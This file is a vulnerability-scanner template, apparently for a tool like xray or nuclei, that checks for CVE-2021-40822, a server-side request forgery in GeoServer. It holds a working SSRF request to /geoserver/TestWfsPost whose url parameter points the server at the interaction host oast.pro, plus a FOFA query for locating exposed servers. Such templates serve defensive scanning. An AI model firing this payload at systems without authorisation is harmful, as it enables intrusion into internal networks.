id: CVE-2021-40822

info:
  name: Geoserver - Server-Side Request Forgery
  author: For3stCo1d
  severity: high
  verified: true
  description: |
    GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
    FOFA: app="GeoServer"
  reference:
    - https://gccybermonks.com/posts/cve-2021-40822/
    - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
    - https://github.com/geoserver/geoserver/releases
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40822
  tags: cve,cve2021,ssrf,geoserver
  created: 2023/06/16

rules:
  r0:
    request:
      method: POST
      path: /geoserver/TestWfsPost
      host: oast.pro
      body: form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=
    expression: response.status == 200 && response.body.bcontains(b'<b>Interactsh</b>') && response.headers["content-type"].contains("text/html")
expression: r0()